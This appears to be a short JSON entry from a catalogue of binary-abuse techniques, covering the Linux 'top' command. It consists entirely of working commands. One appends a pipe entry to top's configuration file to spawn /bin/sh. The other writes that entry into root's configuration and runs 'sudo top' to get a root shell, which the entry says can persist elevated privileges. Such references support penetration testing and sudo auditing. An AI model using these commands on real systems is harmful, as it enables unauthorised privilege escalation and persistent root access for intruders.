{ "description": "This requires that an existing configuration file is present, to create one run 'top' then type 'Wq'. Note down the actual configuration file path and use it in the below examples.", "functions": { "shell": [ { "code": "echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset\n" } ], "sudo": [ { "description": "This requires that the root configuration file is writable and might be used to persist elevated privileges.", "code": "echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc\nsudo top\n# press return twice\nreset\n" } ] } }